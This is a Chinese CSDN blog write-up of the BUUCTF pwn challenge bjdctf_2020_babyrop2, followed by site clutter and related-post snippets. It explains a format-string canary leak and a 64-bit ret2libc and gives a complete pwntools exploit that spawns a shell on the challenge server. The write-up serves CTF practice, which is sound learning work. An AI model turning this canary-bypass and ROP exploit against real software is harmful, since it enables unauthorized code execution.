BUUCTF-bjdctf_2020_babyrop2-WP

于 2023-02-12 18:05:54 发布
阅读量276 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/128997111
版权

1.checksec

64位,NX和canary保护 

2.IDA

1.vuln()函数

 

canary的位置是确定的,0x20-8

2.gift()函数

 

很明显是格式化字符串漏洞 ,绕过canary

又学到一种找偏移的方法

直接用%n$p来试,参数和%n$p之间不能有标点符号

 参数在第7个位置

64位的ret2libc3

3.EXP

from pwn import *

#start 
r = remote("node4.buuoj.cn",27174)
# r = process("./35bjdctf2020babyrop2")
elf = ELF("./35bjdctf2020babyrop2")
libc = ELF("./libc-64.so")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = elf.symbols['vuln']
rdi_addr = 0x400993

#attack
payload = "%7$p"
r.sendlineafter("u!\n",payload)
r.recvuntil("0x")
canary = int(r.recv(16),16)
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
r.sendlineafter("story!\n",payload)
put_addr = u64(r.recv(6).ljust(8,b'\x00'))

#libc
base_addr = put_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("story!\n",payload)

r.interactive()

直接就用buu的libc就行

Rt1Text
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
S-TUNE_Ver
12-11
《S-TUNE_Ver-2_1_11_0--simplified_Chinese:深入了解禾川股份SV-X5系列伺服电机软件》 在工业自动化领域,伺服电机扮演着至关重要的角色,它们以其高精度和快速响应能力被广泛应用于各种机械设备。禾川股份,作为...
wordpress-4.8.1-zh_CN.tar.gz
10-27
4. **配置 wp-config.php**:在WordPress根目录下,编辑wp-config.php文件,输入刚才创建的数据库信息。 5. **运行安装向导**:在浏览器中访问你的网站地址,将引导你完成语言选择、站点标题、管理员账号等基本设置...
pwn7第七关
qq_18823653的博客
04-03 390
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 411
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
bjdctf_2020_babyrop2
z1r0的博客
12-10 338
bjdctf_2020_babyrop2 查看保护 给了一个格式化字符串漏洞函数和栈溢出。 保护开了canary,用格式化漏洞输出canary。接着就是64位下的ret2libc。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26666) else:
[HFCTF2020]BabyUpload
nigo134的博客
06-04 976
通过上传session文件伪造session。
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1546
点开就是源代码,直接进行代码审计
wp-rocket_3.8.3_wp-rocket_
09-29
Wp-Rocket 3.8.3 Nulled
wp-autopost-pro_wpautopostpro_wp-autopost-pro_wp-autopostpro_aut
10-02
"WP AutoPost Pro",这个插件就是解决这一问题的利器,被誉为"完美和谐版本",在标签中提及的"wpautopostpro"、"wp-autopost-pro"以及"autopost3.6.1"和"autopostpro",都是指代该插件的不同关键词或版本号。...
wp.rar_rulerers_wp-admin_网盘html
09-23
'wp-admin'是WordPress的后台管理部分;'网盘html'则表明这个压缩包包含的代码与网络存储服务的前端界面有关,且是用HTML编写的。描述中提到"使用admin-写的网盘代码html +thinkphp",进一步确认了这是一个结合了...
buuxtf [HFCTF2020]BabyUpload
qq_52671379的博客
04-09 1102
buuxtf [HFCTF2020]BabyUpload
[HFCTF2020]BabyUpload session解析引擎
qq_54929891的博客
07-05 1189
对于代码的解析如上,获取flag的途径:1、session中的username参数要为admin2、在 /var/babyctf/success.txt存在在代码审查中可以得到的信息点: 在php中,session文件默认的存储文件名是sess_PHPSESSID,于是我们可以利用donwnload先看一下原先的session文件里面有什么,经过分析可以知道$attr参数我们可以暂时设置为空,因为目前感觉跟我们的操作没多大关系 可以发现有一个不可见字符,不同的php引擎,session的存储方式不一
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 500
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 411
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 368
IDA Pro 静态调试。依旧可以使用上次的PoC。
BUUCTF|PWN-[HarekazeCTF2019]baby_rop2-WP
l2645470582_的博客
01-18 585
1.检查保护机制 开启了堆栈不可执行 2.用64位IDA打开该文件 (1)shift+f12,查看关键字符串 (2)双击,ctrl+x,进入反汇编代码 (3)ROPgadget查看返回地址 (4)payload payload = b'a'*(0x20+0x8) + p64(pop_rdi) + p64(format_) + p64(pop_r15) + p64(got_addr) + p64(0) + p64(plt_addr) + p64(main_addr) 1.
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 267
BUUCTF--pwn--ciscn_2019_c_1
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 313
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
ctfshow-__萌新隐写
最新发布
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值